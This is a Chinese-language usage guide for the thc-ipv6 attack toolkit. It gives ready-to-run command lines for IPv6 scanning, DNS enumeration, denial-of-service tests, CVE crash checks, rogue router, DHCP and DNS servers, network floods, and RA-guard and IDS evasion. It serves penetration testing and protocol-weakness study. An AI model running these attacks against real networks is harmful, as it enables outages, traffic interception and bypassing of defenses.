简介
用于测试 IPv6 和 ICMPv6 协议弱点的攻击工具包。
其中一些工具包括:
- alive6:有效的活体扫描。
- denial6:尝试针对某个对象进行一系列拒绝服务测试目标。
- detector-new-ip6:检测加入网络的新 ip6 设备。
- dnsdict6:并行化 dns ipv6 字典暴力破解器。
- dos-new-ip6:检测新的 ip6 设备并告诉他们他们选择的 IP 在网络上发生冲突 (DOS)。
- exploit6:针对目标测试已知的 ipv6 漏洞。
- fake_mld6:在您选择的多播组中宣布自己网。
- fake_router6:宣布自己是网络上的路由器。
- Flood_advertise6:用随机邻居广告淹没目标。
- Flood_router6:用随机路由器通告淹没目标。
- implementation6:对 ipv6 执行各种实施检查。
- parasite6:icmp 邻居请求/广告欺骗者。
- redir6:智能地将流量重定向到您(中间人) 使用聪明的 icmp6 重定向欺骗程序。
- rsmurf6:远程 smurfer(已知仅适用于 Linux 片刻)。
- thcping6:发送手工制作的 ping6 数据包。
- Toobig6:MTU 减小器,具有与 redir6 相同的智能。
- 等等
安装
thc-ipv6 工具默认安装在 Kali Linux 里面了。也可以通过以下命令进行安装
bash
apt install thc-ipv6
使用
1. atk6-address6
将 mac 或 IPv4 地址转换为 IPv6 地址(如果没有提供前缀作为第二个选项,则链接本地),或者在给定 IPv6 地址时,打印 mac 或 IPv4 地址。打印所有可能的变体。如果出现错误或发现的变体数量,则返回 -1
bash
atk6-address6 -h
将 IPv6 地址转换为 MAC 地址,反之亦然:
bash
atk6-address6 fe80::20c:29ff:fef4:8e14 00:0c:29:f4:8e:14
bash
atk6-address6 74:d4:35:4e:39:c8 fe80::76d4:35ff:fe4e:39c8
2. atk6-alive6
有效的活动扫描,将检测所有系统听这个地址
命令行或输入文件中的目标地址可以包含以下形式的范围:
2001:db8::1-fff 或 2001:db8::1-2:0-ffff:0:0-ffff 等。
不要将范围(从-到)选项与 -M、-C 或 -4 一起使用。如果使用 SYN 数据包(-s/-F 选项),则将执行自动操作系统检测。出现错误时返回 -1,如果发现系统处于活动状态则返回 0,如果未发现任何内容则返回 1。
2.1 -h
显示更多命令行选项和帮助(-hh:更多选项)
bash
atk6-alive6 -h
2.2 常规使用
bash
atk6-alive6 eth0
输出选项
2.3 -i file
从输入文件检查系统
bash
atk6-alive6 -i targets.txt eth0
2.4 -o file
将结果写入输出文件
bash
atk6-alive6 -o results.txt eth0
2.5 -v
详细信息(两次:详细信息,三次:转储数据包)
bash
atk6-alive6 -v eth0
2.6 -V
启用调试输出
bash
atk6-alive6 -V eth0
2.7 -d
DNS 解析活动 IPv6 地址
bash
atk6-alive6 -d eth0
2.8 -H
打印接收数据包的跳数
bash
atk6-alive6 -H eth0
枚举选项
2.9 -M
枚举硬件地址(MAC) 来自输入地址(慢!)
bash
atk6-alive6 -M eth0
2.10 -C
枚举输入网络的公共地址,-CC 用于大规模扫描
bash
atk6-alive6 -C eth0
2.11 -4 ipv4/range
测试每个网络的各种 IPv4 地址编码(例如 1.2.3.4/24)
bash
atk6-alive6 -4 192.168.174.0/24 eth0
2.12 -y step
用于范围扫描(2000::0-f),定义步长范围(默认值:1)
bash
atk6-alive6 -y 10 eth0
存活检测选项
2.13 -p
发送 ping 数据包进行活动检查(默认值)
bash
atk6-alive6 -p eth0
2.14 -e dst,hop
发送错误数据包:目标(默认值),逐跳
bash
atk6-alive6 -e dst eth0
2.15 -s port,port,..
TCP-SYN 数据包到端口进行活动检查或"端口扫描"
bash
atk6-alive6 -s 80,443 eth0
2.16 -a port,port,..
TCP-ACK 数据包到端口进行活动检查
bash
atk6-alive6 -a 22,25 eth0
2.17 -u port,port,..
UDP 数据包到端口进行活动检查
bash
atk6-alive6 -u 53 eth0
2.18 -F
防火墙模式:-p -e dst -u 53 -s 22,25,80,443,9511 -a 9511
bash
atk6-alive6 -F eth0
2.19 -R
不考虑TCP-RST 为活动状态(适用于防火墙,例如 -F)
bash
atk6-alive6 -R eth0
发送选项
2.20 -n number
发送每个数据包的频率(默认值:本地 1,远程 2)
bash
atk6-alive6 -n 3 eth0
2.21 -W time
发送数据包后等待的时间(以毫秒为单位)(默认值:1)
bash
atk6-alive6 -W 10 eth0
2.22 -S
慢速模式,为每个远程目标或代理 NA 获取最佳路由器
bash
atk6-alive6 -S eth0
2.23 -I src[/mask]
使用指定的 IPv6 地址作为源。使用随机掩码。
bash
atk6-alive6 -I fe80::20c:29ff:fef4:8e14 eth0
2.24 -l
使用链路本地地址作为多播地址,而不是全局地址
bash
atk6-alive6 -l eth0
2.25 -P
仅打印将被扫描的地址,不发送任何数据包!
bash
atk6-alive6 -P eth0
2.26 -L
本地模式 - 仅执行 NDP 并报告本地系统处于活动状态
bash
atk6-alive6 -L eth0
2.27 -r
为每个新目标更新 IPv6 源地址(若无则等待)
bash
atk6-alive6 -r eth0
2.28 -T tag
将标记字符串放入 ICMP 数据包中
bash
atk6-alive6 -T "TestTag" eth0
2.29 -x port
TCP/UDP 源端口(用于 -s、-a 和 -u)
bash
atk6-alive6 -x 12345 eth0
2.30 -Z mac
使用给定的目标 mac 地址
bash
atk6-alive6 -Z 00:11:22:33:44:55 eth0
2.31 -m
原始模式(用于没有以太网的网络适配器)
bash
atk6-alive6 -m eth0
3. atk6-connect6
您可以为目标 ip 提供 %interface 标识符。连接成功时返回 0,超时/重置时返回 1
3.1 -h
查看帮助
bash
atk6-connect6 -h
3.2 常规使用
bash
atk6-connect6 fe80::20c:29ff:fef4:8e14%eth0 80
3.3 -a
发送逐跳路由器警报选项
bash
atk6-connect6 -a fe80::20c:29ff:fef4:8e14%eth0 80
3.4 -A type
类似于 -a,但允许您定义警报类型(数字)
bash
atk6-connect6 -A 5 fe80::20c:29ff:fef4:8e14%eth0 80
3.5 -i
交互模式(如 telnet)
bash
atk6-connect6 -i fe80::20c:29ff:fef4:8e14%eth0 80
3.6 -I
结束换行,等待字符串,打印它
bash
atk6-connect6 -I fe80::20c:29ff:fef4:8e14%eth0 80
3.7 -O
尝试 TCP 快速打开连接
bash
atk6-connect6 -O fe80::20c:29ff:fef4:8e14%eth0 80
3.8 -w ms
等待连接时间(毫秒)(默认值:1000)
bash
atk6-connect6 -w 2000 fe80::20c:29ff:fef4:8e14%eth0 80
3.9 -p
ping 模式
bash
atk6-connect6 -p fe80::20c:29ff:fef4:8e14%eth0 80
4. atk6-connsplit6
atk6-connsplit6 是 THC-IPv6 工具套件中的一个工具,用于操控 TCP 连接,特别是通过将源地址或目标地址分离,增加连接分析的难度。它专注于监听或操控特定端口上的流量(默认是 64446)。
4.1 -h
bash
atk6-connsplit6 -h
4.2 -v
详细模式
4.3 -d
调试模式
bash
atk6-connsplit6 -vd eth0 client
5. atk6-covert_send6
将 FILE 的内容秘密发送到目标,并且它的 POC - 不要排除太复杂 - 它只是放入目标标头。
bash
atk6-covert_send6 -h
5.1 -m mtu
指定最大 MTU(默认值:接口 MTU,最小值:1000)
bash
atk6-covert_send6 -m 1200 eth0 fe80::20c:29ff:fef4:8e14 secret.txt 80
5.2 -k key
使用 Blowfish-160 加密内容
bash
atk6-covert_send6 -k mysecretkey eth0 fe80::20c:29ff:fef4:8e14 secret.txt 80
5.3 -s resend
发送每个数据包 RESEND 次数,默认值:1
bash
atk6-covert_send6 -s 3 eth0 fe80::20c:29ff:fef4:8e14 secret.txt 80
6. atk6-covert_send6d
将秘密接收的内容写入文件。
bash
atk6-covert_send6d -h
-k key
使用 Blowfish-160 解密内容
bash
atk6-covert_send6d -k eth0 secret.txt
7. atk6-denial6
对目标执行各种拒绝服务攻击
bash
atk6-denial6 -h
如果系统存在漏洞,则可能会崩溃或承受重负载,因此请小心!
当前已实施以下测试用例:
1:带有路由器警报并填充未知选项的大型逐跳报头
2:填充未知选项的大型目标报头
3:带有路由器警报选项的逐跳报头加上 180 个报头
4:带有路由器警报选项的逐跳报头加上 178 个报头 + ping
5:AH 报头 + ping
6:带有带有路由器警报的逐跳报头的 ping 的第一个片段
7:填充未知选项的大型逐跳报头(无路由器警报)
bash
atk6-denial6 eth0 fe80::20c:29ff:fef4:8e14 1
atk6-denial6 eth0 fe80::20c:29ff:fef4:8e14 2
atk6-denial6 eth0 fe80::20c:29ff:fef4:8e14 3
atk6-denial6 eth0 fe80::20c:29ff:fef4:8e14 4
atk6-denial6 eth0 fe80::20c:29ff:fef4:8e14 5
atk6-denial6 eth0 fe80::20c:29ff:fef4:8e14 6
atk6-denial6 eth0 fe80::20c:29ff:fef4:8e14 7
8. atk6-detect-new-ip6
此工具可检测加入本地网络的新 IPv6 地址。
如果提供了脚本,则以检测到的 IPv6 地址作为第一个命令行选项并以接口作为第二个命令行选项来执行。
bash
atk6-detect-new-ip6 -h
bash
atk6-detect-new-ip6 eth0
9. atk6-detect_sniffer6
测试本地 LAN 上的系统是否正在嗅探。
适用于 Windows、Linux、OS/X 和 *BSD,如果未指定目标,则使用 link-local-all-nodes 地址,但该地址并不总是有效。
bash
atk6-detect_sniffer6 -h
bash
atk6-detect_sniffer6 eth0
10. atk6-dnsdict6
枚举 DNS 条目的域,如果提供则使用字典文件。否则使用内置列表。此工具基于 gnucitizen.org 的 dnsmap。
bash
atk6-dnsdict6 -h
10.1 常规使用
bash
atk6-dnsdict6 google.com
10.2 -4
也转储 IPv4 地址
bash
atk6-dnsdict6 -4 google.com
10.3 -t NO
指定要使用的线程数(默认值:8,最大值:32)。
bash
atk6-dnsdict6 -t 16 google.com
10.4 -D
转储选定的内置单词表,不进行扫描。
bash
atk6-dnsdict6 -D google.com
10.5 -d
显示 NS 和 MX DNS 域信息上的 IPv6 信息。
bash
atk6-dnsdict6 -d google.com
10.6 -e
忽略域错误的 NS
bash
atk6-dnsdict6 -e google.com
10.7 -S
执行 SRV 服务名称猜测
bash
atk6-dnsdict6 -S google.com
10.8 -[smlxu]
通过 -s(mall=100)、-m(edium=1419) (默认) 选择字典大小、-l(arge=2601)、-x(treme=5886) 或 -u(ber=16724)
bash
atk6-dnsdict6 -smlxu google.com
11. atk6-dnsrevenum6
执行快速反向 DNS 枚举,能够应对速度慢的服务器。
bash
atk6-dnsrevenum6 -h
常规使用
bash
atk6-dnsrevenum6 dns.test.com 2001:db8:42a8::/48
-t
启用 TCP 而不是 UDP(如果出现多次超时,请使用此选项)
bash
atk6-dnsrevenum6 -t dns.test.com 8.a.2.4.8.b.d.0.1.0.0.2.ip6.arpa
12. atk6-dnssecwalk
执行 DNSSEC NSEC 遍历。
bash
atk6-dnssecwalk -h
示例
bash
atk6-dnssecwalk dns.test.com google.com
12.1 -e
确保域存在于找到的地址中,否则退出
bash
atk6-dnssecwalk -e dns.test.com google.com
12.2 -4
将找到的条目解析为 IPv4 地址
bash
atk6-dnssecwalk -4 dns.test.com google.com
12.3 -6
将找到的条目解析为 IPv6 地址
bash
atk6-dnssecwalk -6 dns.test.com google.com
12.4 -t
使用 TCP 而不是 UDP
bash
atk6-dnssecwalk -t dns.test.com google.com
13. atk6-dos-new-ip6
此工具通过向重复的 ip6 检查 (DAD) 发送答案来阻止新的 IPv6 接口出现。这会导致新的 IPv6 设备出现 DOS。
bash
atk6-dos-new-ip6 -h
-S
发送冲突的 NS 查询而不是 NA 回复,但它限制了源随机化。
bash
atk6-dos-new-ip6 -S eth0
14. atk6-dump_dhcp6
DHCPv6 信息工具。转储可用服务器及其设置。您可以指定特定的 DHCPv6 服务器作为目标。
bash
atk6-dump_dhcp6 -h
14.1 -V
vendorid 发送 vendorid 编号、字符串(例如 11、test)
bash
atk6-dump_dhcp6 -V 11 eth0 fe80::20c:29ff:fef4:8e14
14.2 -N
使用 fe80:: 作为源
bash
atk6-dump_dhcp6 -N eth0 fe80::20c:29ff:fef4:8e14
14.3 -n
使用空 mac 作为源
bash
atk6-dump_dhcp6 -n eth0 fe80::20c:29ff:fef4:8e14
15. atk6-dump_router6
转储所有本地路由器及其信息
bash
atk6-dump_router6 -h
bash
atk6-dump_router6 eth0
16. atk6-exploit6
在目标上执行各种 CVE 已知 IPv6 漏洞的利用。请注意,对于可利用的溢出,仅使用"AAA..."字符串。如果系统存在漏洞,它将崩溃,所以要小心!
bash
atk6-exploit6 -h
通过 eth0 对 fe80::20c:29ff:fef4:8e14 执行漏洞检查:
测试 0:正常 ping6 已通过 - 我们收到回复
测试 1:CVE-NONE 过大 ping,6 个校验和组合
警告:由于目标平台上的实现差异,大于 65535 的数据包的校验和不可靠
测试 2:CVE-NONE 大 ping,3 个校验和组合
警告:由于目标平台上的实现差异,大于 65535 的数据包的校验和不可靠
测试 3:CVE-2003-0429 前缀长度错误(信息很少,实现不确定
测试 4:CVE-2004-0257 ping,在回复时发送过大,然后发送 SYN pkt
测试 5:正常 ping6(仍然有效?)已通过 - 我们收到回复
bash
atk6-exploit6 eth0 fe80::20c:29ff:fef4:8e14 0
atk6-exploit6 eth0 fe80::20c:29ff:fef4:8e14 1
atk6-exploit6 eth0 fe80::20c:29ff:fef4:8e14 2
atk6-exploit6 eth0 fe80::20c:29ff:fef4:8e14 3
atk6-exploit6 eth0 fe80::20c:29ff:fef4:8e14 4
atk6-exploit6 eth0 fe80::20c:29ff:fef4:8e14 5
17. atk6-extract_hosts6
在 FILE 中打印 IPv6 地址的主机部分
bash
atk6-extract_hosts6 file.txt
18. atk6-extract_networks6
打印在 FILE 中找到的网络
bash
atk6-extract_networks6 file.txt
19. atk6-fake_advertise6
在网络上通告 IPv6 地址(如果未指定,则使用自己的 mac),如果未设置目标地址,则将其发送到所有节点多播地址。如果未设置,则源 ip 地址是通告的地址。
bash
atk6-fake_advertise6 -h
示例
bash
atk6-fake_advertise6 eth0 fe80::20c:29ff:fef4:8e14
发送选项
19.1 -n count
发送多少个数据包(默认值:永远)
bash
atk6-fake_advertise6 -n 10 eth0 fe80::20c:29ff:fef4:8e14
19.2 -w seconds
发送数据包之间的等待时间(默认值:5)
bash
atk6-fake_advertise6 -w 5 eth0 fe80::20c:29ff:fef4:8e14
19.3 -m srcmac
发送的 srcmac 地址(不是广告的地址!)
bash
atk6-fake_advertise6 -m 00:11:22:33:44:55 eth0 fe80::20c:29ff:fef4:8e14
标志选项
19.4 -O
不设置覆盖标志(默认值:开启)
19.5 -r
设置路由器标志(默认值:关闭)
19.6 -s
设置请求标志(默认值:关闭)
bash
atk6-fake_advertise6 -Ors eth0 fe80::20c:29ff:fef4:8e14
ND 安全规避选项(可以组合使用)
19.7 -F
完全规避攻击(不允许使用其他规避选项)
19.8 -H
添加逐跳标头
19.9 -f
添加一次性片段标头(可以多次指定)
bash
atk6-fake_advertise6 -f eth0 fe80::20c:29ff:fef4:8e14
19.10 -D
添加大型目标标头以对数据包进行分段。
bash
atk6-fake_advertise6 -DHF eth0 fe80::20c:29ff:fef4:8e14
20. atk6-fake_dhcps6
伪 DHCPv6 服务器。用于配置地址并设置 DNS 服务器
bash
atk6-fake_dhcps6 -h
bash
atk6-fake_dhcps6 eth0 2001:db8:abcd::/64 2001:db8:abcd::1 2001:db8:abcd::2 00:11:22:33:44:55
21. atk6-fake_dns6d
为任何查找请求提供相同 IPv6 地址的虚假 DNS 服务器。如果客户端有固定的 DNS 服务器,则可以将其与 parasite6 一起使用
注意:非常简单的服务器。不支持数据包中的多个查询、NS、MX 等查找。
bash
atk6-fake_dns6d -h
bash
atk6-fake_dns6d eth0 fe80::20c:29ff:fef4:8e14
22. atk6-fake_dnsupdate6
发送虚假 DNS 更新请求。
bash
atk6-fake_dnsupdate6 -h
bash
atk6-fake_dnsupdate6 dns.test.com myhost.sub.test.com fe80::20c:29ff:fef4:8e14
23. atk6-fake_mipv6
如果移动 IPv6 home-agent 被错误配置为接受没有 IPSEC 的 MIPV6 更新,这会将所有 home-address 的数据包重定向到 care-of-address
bash
atk6-fake_mipv6 -h
bash
atk6-fake_mipv6 eth0 2001:db8:abcd::1 2001:db8:abcd::2 2001:db8:abcd::3
24. atk6-fake_mld26
这使用 MLDv2 协议。只有协议能够执行的部分功能可以通过命令行实现。如果您需要,请对其进行编码。
bash
atk6-fake_mld26 -h
-l
在网络上查询谁在监听多播地址,循环并发送(间隔 5 秒),直到按下 Control-C。
bash
atk6-fake_mld26 -l eth0 add fe80::20c:29ff:fef4:8e14
atk6-fake_mld26 -l eth0 delete fe80::20c:29ff:fef4:8e14
atk6-fake_mld26 -l eth0 query fe80::20c:29ff:fef4:8e14
25. atk6-fake_mld6
在您选择的多播组中发布或删除您自己或您想要的任何人
bash
atk6-fake_mld6 -h
-l
在网络上查询谁在监听多播地址, 循环发送(间隔 5 秒),直到按下 Control-C。
bash
atk6-fake_mld6 -l eth0 add fe80::20c:29ff:fef4:8e14
atk6-fake_mld6 -l eth0 delete fe80::20c:29ff:fef4:8e14
atk6-fake_mld6 -l eth0 query fe80::20c:29ff:fef4:8e14
26. atk6-fake_mldrouter6
宣布、删除或请求 MLD 路由器 - 自己或其他。
bash
atk6-fake_mldrouter6 -h
-l
使用 -l 循环发送(以 5 秒为间隔),直到按下 Control-C。
bash
atk6-fake_mldrouter6 -l eth0 advertise fe80::20c:29ff:fef4:8e14
atk6-fake_mldrouter6 -l eth0 solicitate fe80::20c:29ff:fef4:8e14
atk6-fake_mldrouter6 -l eth0 terminate fe80::20c:29ff:fef4:8e14
27. atk6-fake_pim6
hello 命令可选地采用 DR 优先级(默认值:0)。
join 和 prune 命令需要要修改的多播组、加入或离开的目标地址和邻居 PIM 路由器
bootstrap 命令需要 bootstraprouter 地址和可选的优先级和会合点。
assert 命令需要相关的多播地址和可选的度量和多播发送者。
bash
atk6-fake_pim6 -h
27.1 -l
每 5 秒循环数据包
bash
atk6-fake_pim6 -l eth0 hello
27.2 -f
泛洪数据包(在有用的地方使用随机值,例如 src)
bash
atk6-fake_pim6 -f eth0 bootstrap fe80::1 5 ff05::2
27.3 -t
ttl 指定非标准 ttl
bash
atk6-fake_pim6 -t eth0 assert ff05::2 10 fe80::2
27.4 -s src6
指定源 IPv6 地址
bash
atk6-fake_pim6 -s eth0 join fe80::1 ff05::2 ff05::1
27.5 -d dst6
指定非标准目标 IPv6 地址
bash
atk6-fake_pim6 -d eth0 join fe80::1 ff05::2 ff05::1
28. atk6-fake_router26
与 fake_router6 类似,但有更多可用选项。
bash
atk6-fake_router26 -h
28.1 -A network/prefix
添加自动配置网络(最多 16 次)
28.2 -a seconds
前缀 -A 的有效生存期(默认为 99999)
bash
atk6-fake_router26 -A 2001:db8:1::/64 -a 3600 eth0
28.3 -R network/prefix
添加路由条目(最多 16 次)
28.4 -r seconds
路由条目 -R 的生存期(默认为 4096)
bash
atk6-fake_router26 -R 2001:db8:1::/64 -r 3600 eth0
28.5 -D dns-server
指定 DNS 服务器(最多到 16 次)
bash
atk6-fake_router26 -D 2001:4860:4860::8888 eth0
28.6 -L searchlist
指定 DNS 域搜索列表,使用 , 分隔条目
bash
atk6-fake_router26 -L dnslist eth0
28.7 -d seconds
-D 的 dns 条目生存期 (默认为 4096)
bash
atk6-fake_router26 -D 2001:4860:4860::8888 -d 3600 eth0
28.8 -M mtu
要发送的 MTU,默认为接口设置
bash
atk6-fake_router26 -M 50 eth0
28.9 -s sourceip
路由器的源 ip,默认为本地链接
28.10 -S sourcemac
路由器的源 mac,默认为接口
bash
atk6-fake_router26 -s fe80::1 -S 00:11:22:33:44:55 eth0
28.11 -f ethernetmac
用于发送帧的以太网 mac 地址
bash
atk6-fake_router26 -f fe80::1 eth0
28.12 -l seconds
路由器生存期 (默认为 2048)
bash
atk6-fake_router26 -l 30 eth0
28.13 -T ms
可达计时器 (默认为 0)
bash
atk6-fake_router26 -T 3000 eth0
28.14 -t ms
重传计时器 (默认为 0)
bash
atk6-fake_router26 -t 3000 eth0
28.15 -p priority
优先级"low(低)"、"medium(中)"、"high(高)"(默认)、"reserved(保留)"
bash
atk6-fake_router26 -p medium eth0
28.16 -F flags
设置以下一个或多个标志:managed、other、homeagent、proxy、reserved;以逗号分隔
bash
atk6-fake_router26 -F managed eth0
28.17 -E type
路由器广告防护规避选项。类型:
F 完全规避(Windows 和 FreeBSD)
H 简单的逐跳报头
1 简单的一次性碎片报头(可以添加多个)
D 插入一个大目标报头,以便它碎片化
O 保持第一目标的重叠碎片(Win、BSD、Mac)
o 保持最后目标的重叠碎片(Linux、Solaris)
bash
atk6-fake_router26 -E H111 eth0
atk6-fake_router26 -E D eth0
28.18 -m mac-address
如果只有一台机器应该接收 RA(不与 -E DoO 一起使用)
bash
atk6-fake_router26 -m 00:11:22:33:44:55 eth0
28.19 -i interval
RA 数据包之间的时间(默认值:5)
bash
atk6-fake_router26 -i 10 eth0
28.20 -n number
要发送的 RA 数量(默认值:无限制)
bash
atk6-fake_router26 -n 100 eth0
28.21 -X
通过取消宣布假路由器进行清理(默认值:禁用)
bash
atk6-fake_router26 -X eth0
29. atk6-fake_router6
宣布自己是路由器并尝试成为默认路由器。如果提供了不存在的链路本地或 mac 地址,则会导致 DOS。
bash
atk6-fake_router6 -h
-H 添加逐跳、-F 分段标头和 -D dst 标头。
bash
atk6-fake_router6 -HFD eth0 2001:db8::/64
30. atk6-fake_solicitate6
在网络上复制 IPv6 地址,并将其发送到所有节点多播地址
bash
atk6-fake_solicitate6 -h
bash
atk6-fake_solicitate6 eth0 fe80::20c:29ff:fef4:8e14
31. atk6-firewall6
执行各种 ACL 绕过尝试以检查实现。
bash
atk6-firewall6 -h
默认为 TCP 端口,选项 -u 切换到 UDP。选项 -H 打印跳数。要使所有测试用例都能正常工作,必须允许对目标进行 ICMPv6 ping。
bash
atk6-firewall6 -Hu eth0 fe80::20c:29ff:fef4:8e14 80
32. atk6-flood_advertise6
用邻居广告淹没本地网络。
bash
atk6-flood_advertise6 -h
选项 -k 使用您的真实 src mac 发送,-m 使用指定的 src mac 发送,否则每个数据包随机发送。
bash
atk6-flood_advertise6 -k eth0 fe80::20c:29ff:fef4:8e14
atk6-flood_advertise6 -m 00:11:22:33:44:55 eth0 fe80::20c:29ff:fef4:8e14
33. atk6-flood_dhcpc6
DHCP 客户端泛洪器。用于耗尽 DHCP6 服务器提供的 IP 地址池。注意:如果池很大,这毫无意义。:-)
bash
atk6-flood_dhcpc6 -h
默认情况下,链路本地 IP MAC 地址是随机的,但在某些情况下这不起作用。
-n 将使用真实 MAC,-N 将使用真实 MAC 和链路本地地址。-1 将仅请求地址但不请求它。
如果未使用 -N,则应并行运行 parasite6。使用 -d 强制 DNS 更新,您必须指定域名。
bash
atk6-flood_dhcpc6 -n -1 -d google.com eth0
atk6-flood_dhcpc6 -N -1 -d google.com eth0
34. atk6-flood_mld26
使用 MLDv2 报告淹没本地网络。
bash
atk6-flood_mld26 -h
bash
atk6-flood_mld26 eth0 fe80::20c:29ff:fef4:8e14 20
35. atk6-flood_mld6
使用 MLD 报告淹没本地网络。
bash
atk6-flood_mld6 -h
bash
atk6-flood_mld6 eth0 fe80::20c:29ff:fef4:8e14
36. atk6-flood_mldrouter6
使用 MLD 路由器广告淹没本地网络。
bash
atk6-flood_mldrouter6 -h
bash
atk6-flood_mldrouter6 eth0 fe80::20c:29ff:fef4:8e14
37. atk6-flood_redir6
使用 ICMPv6 重定向数据包淹没本地网络。
bash
atk6-flood_redir6 -h
-F/-D/-H 添加 fragment/destination/hopbyhop 标头以绕过简单过滤器
-a 添加带有路由器警报的 hopbyhop
bash
atk6-flood_redir6 -HFD -a eth0
38. atk6-flood_router26
与 flood_router6 类似,但有更多选项可用。用路由器广告淹没本地网络。每个数据包包含 ~25 个前缀和路由条目
bash
atk6-flood_router26 -h
模式:默认发送路由条目和前缀信息
38.1 -R
仅发送路由条目,不发送前缀信息
bash
atk6-flood_router26 -R eth0 fe80::20c:29ff:fef4:8e14
38.2 -P
仅发送前缀信息,不发送路由条目
bash
atk6-flood_router26 -P eth0 fe80::20c:29ff:fef4:8e14
38.3 -A
禁用隐私扩展的攻击
bash
atk6-flood_router26 -A eth0 fe80::20c:29ff:fef4:8e14
选项
38.4 -a
添加带有路由器警报的 hopbyhop 标头
bash
atk6-flood_router26 -a eth0 fe80::20c:29ff:fef4:8e14
38.5 -H
添加 hopbyhop 标头以绕过 RA 防护安全
bash
atk6-flood_router26 -H eth0 fe80::20c:29ff:fef4:8e14
38.6 -f
添加原子片段标头以绕过 RA 防护安全
bash
atk6-flood_router26 -f eth0 fe80::20c:29ff:fef4:8e14
38.7 -D
添加大型目标标头以绕过 RA 防护安全
bash
atk6-flood_router26 -D eth0 fe80::20c:29ff:fef4:8e14
38.8 -F
执行完整的 RA 防护规避(不允许所有其他绕过选项)
bash
atk6-flood_router26 -F eth0 fe80::20c:29ff:fef4:8e14
38.9 -s
使用较小的生命周期,导致更具破坏性的影响
bash
atk6-flood_router26 -s eth0 fe80::20c:29ff:fef4:8e14
38.10 -S
执行缓慢启动,这会增加影响
bash
atk6-flood_router26 -S eth0 fe80::20c:29ff:fef4:8e14
38.11 -G
64kb 前缀/路由条目的巨型数据包
bash
atk6-flood_router26 -G eth0 fe80::20c:29ff:fef4:8e14
38.12 -m
将 DHCPv6 管理/其他标志添加到 RA
bash
atk6-flood_router26 -m eth0 fe80::20c:29ff:fef4:8e14
39. atk6-flood_router6
用路由器广告淹没本地网络。
bash
atk6-flood_router6 -h
-F/-D/-H 添加 fragment/destination/hopbyhop 标头以绕过 RA 保护安全。
bash
atk6-flood_router6 -HFD eth0
40. atk6-flood_rs6
使用 ICMPv6 路由器请求数据包淹没本地网络。
bash
atk6-flood_rs6 -h
选项 -s 使用随机源 IPv6 地址。选项 -S 还会随机化 MAC。
bash
atk6-flood_rs6 -sS eth0
41. atk6-flood_solicitate6
使用邻居请求向网络发送洪泛消息。
bash
atk6-flood_solicitate6 -h
bash
atk6-flood_solicitate6 -k eth0
atk6-flood_solicitate6 -m 00:11:22:33:44:55 eth0
atk6-flood_solicitate6 -a eth0
42. atk6-flood_unreach6
使用 ICMPv6 不可达数据包淹没目标。
bash
atk6-flood_unreach6 -h
42.1 -F/-D/-H
添加 fragment/destination/hopbyhop 标头以绕过简单过滤器
bash
atk6-flood_unreach6 -F eth0 fe80::20c:29ff:fef4:8e14
atk6-flood_unreach6 -D eth0 fe80::20c:29ff:fef4:8e14
atk6-flood_unreach6 -H eth0 fe80::20c:29ff:fef4:8e14
42.2 -p/-h
发送端口/主机不可达而不是网络不可达
bash
atk6-flood_unreach6 -p eth0 fe80::20c:29ff:fef4:8e14
atk6-flood_unreach6 -h eth0 fe80::20c:29ff:fef4:8e14
42.3 -r/-R
从 /64 随机化源 / 完全随机化源
bash
atk6-flood_unreach6 -r eth0 fe80::20c:29ff:fef4:8e14
atk6-flood_unreach6 -R eth0 fe80::20c:29ff:fef4:8e14
43. atk6-four2six
将 IPv4 数据包发送到 IPv6 4to6 网关。如果指定了端口,则发送 UDP 数据包,否则发送 ICMPv4 ping。
bash
atk6-four2six -h
43.1 -F
插入原子片段报头(可多次设置)
bash
atk6-four2six -F eth0 2001:db8::1 192.168.1.2 192.168.1.3
43.2 -H
插入并清空逐跳报头
bash
atk6-four2six -H eth0 2001:db8::1 192.168.1.2 192.168.1.3
43.3 -D
插入将数据包分段的大型目标报头
bash
atk6-four2six -D eth0 2001:db8::1 192.168.1.2 192.168.1.3
43.4 -p srcport
设置特定的 UDP 源端口或 Ping ID
bash
atk6-four2six -p 12345 eth0 2001:db8::1 192.168.1.2 192.168.1.3 53
43.5 -s src6
设置特定的 IPv6 源地址
bash
sudo atk6-four2six -s 2001:db8::100 eth0 2001:db8::1 192.168.1.2 192.168.1.3
43.6 -m srcmac
设置特定的 MAC 源地址
bash
atk6-four2six -m 00:11:22:33:44:55 eth0 2001:db8::1 192.168.1.2 192.168.1.3
44. atk6-fragmentation6
执行片段防火墙和实施检查,包括拒绝服务。
bash
atk6-fragmentation6 -h
-f 激活泛洪模式,发送之间无暂停;-p 禁用第一次和最后一次 ping,-n number 指定每次测试的执行频率
bash
atk6-fragmentation6 -f eth0 fe80::20c:29ff:fef4:8e14 1
atk6-fragmentation6 -fp eth0 fe80::20c:29ff:fef4:8e14 2
atk6-fragmentation6 -n 10 eth0 fe80::20c:29ff:fef4:8e14
45. atk6-fragrouter6
对所有来自您的系统或通过它的已定义数据包执行 NIDS/NIPS 规避。所有规避方法都可以组合(加在一起),但一次只能使用 64 或 128 中的一个。
bash
atk6-fragrouter6 -h
选项 1024 可与 1..31 和 64 一起使用。规避方法按以下顺序处理:256、512、2048、1..31/33..63,然后是 64 或 128,然后是 1024。需要设置跳转到 NFQUEUE 的 ip6table 规则,使用 fragrouter6.sh。它是 ip6tables 和 fragrouter6 的包装器!
规避方法
0 无操作
1-31 要插入的原子碎片标头的数量
32 使用 1-31 的目标标头而不是碎片标头
64 将每个数据包分割为 8 字节长度的片段(或更改为-f)
128 一个大型目标报头,用于对数据包进行分段
256 插入伪造的 TCP 数据,其跳数仅用于 IDS (-e)
512 插入 TCP 连接重置数据包,其跳数仅用于 IDS (-e)
1024 插入伪造的分段数据,其跳数仅用于 IDS (-e)
2048 插入伪造的 seq/ack 数据 TCP 数据包
45.1 -f len
迷你片段的大小(选项 64,默认为 8)
bash
atk6-fragrouter6 -f 6 eth0 64
45.2 -e count
到 IDS 的跳数以规避(选项 256 和 512)
bash
atk6-fragrouter6 -e 15 eth0 512
45.3 -t count
到达目标的跳数
45.4 -v
详细模式,打印所有为规避而处理的数据包
bash
atk6-fragrouter6 -e 15 -t 20 -v eth0 1024
46. atk6-fuzz_dhcpc6
发送到 DHCPv6 客户端的模糊消息
bash
atk6-fuzz_dhcpc6 -h
选项
-1 fuzz DHCPv6 请求
-2 fuzz DHCPv6 通告(默认)
-3 fuzz DHCPv6 请求
-4 fuzz DHCPv6 确认
-5 fuzz DHCPv6 续订
-6 fuzz DHCPv6 重新绑定
-7 fuzz DHCPv6 回复
-8 fuzz DHCPv6 发布
-9 fuzz DHCPv6 拒绝
